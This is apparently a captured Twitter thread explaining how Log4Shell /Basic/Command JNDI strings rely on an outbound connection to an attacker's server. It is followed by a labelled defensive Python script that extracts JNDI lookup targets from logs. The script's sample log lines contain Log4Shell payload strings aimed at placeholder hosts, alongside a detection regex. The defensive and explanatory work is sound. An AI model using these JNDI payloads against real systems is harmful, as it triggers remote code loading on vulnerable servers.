cybercrime connoisseur and synapse fanboy | hax @OSUSEC | tweets my own | @captainGeech@infosec.exchange
Dec 13, 2021 • 8 tweets • 6 min read
In a conversation I had with some folks yesterday about different exploit techniques for CVE-2021-44228, there was some confusion around how the /Basic/Command JNDI strings work. Let me break down what's happening here in a 🧵 (1/8)
#Log4Shell #log4j
First, these URIs are not a native part of the LDAP protocol. They aren't being handled by the JNDI lookup internally, and still require an outbound TCP connection to the attacker's malicious TCP server.
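A defender-side illustration of the point above, added here and not part of the original thread: because the lookup still needs an outbound connection, the host and port inside a logged JNDI string are what to match against egress and firewall logs, while the /Basic/Command path is only a name handed to whatever server answers. The log lines, addresses and function names are constructed for this example, and only plain, unobfuscated lookups are handled.

```python
import re
from urllib.parse import urlsplit

# Plain (unobfuscated) JNDI lookup as it appears in a log line.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)

# Standard ports used when the URI does not carry one.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

def extract_jndi_targets(line):
    """Return one dict per JNDI lookup found in a log line."""
    targets = []
    for match in JNDI_RE.finditer(line):
        url = urlsplit(match.group(1))
        scheme = url.scheme.lower()
        try:
            port = url.port or DEFAULT_PORTS.get(scheme)
        except ValueError:  # malformed port in the logged string
            port = None
        targets.append({
            "scheme": scheme,
            "host": url.hostname,  # destination of the outbound connection
            "port": port,
            # To the client the path is just the name it asks the server for;
            # any meaning of /Basic/Command is decided by that server.
            "name": url.path.lstrip("/"),
            "basic_command": url.path.startswith("/Basic/Command"),
        })
    return targets

def egress_watchlist(lines):
    """Sorted (host, port) pairs to look for in outbound connection logs."""
    return sorted({(t["host"], t["port"])
                   for line in lines for t in extract_jndi_targets(line)})

# Constructed sample log lines (documentation-range addresses, placeholder path).
SAMPLE_LOG = [
    '2021-12-13 10:00:01 GET /login ua="${jndi:ldap://192.0.2.10:1389/Basic/Command/EXAMPLE}"',
    '2021-12-13 10:00:02 GET /index ua="Mozilla/5.0"',
    '2021-12-13 10:00:03 GET /search q=${jndi:ldap://198.51.100.7/a}',
]

if __name__ == "__main__":
    for host, port in egress_watchlist(SAMPLE_LOG):
        print(f"check outbound connections to {host}:{port}")
```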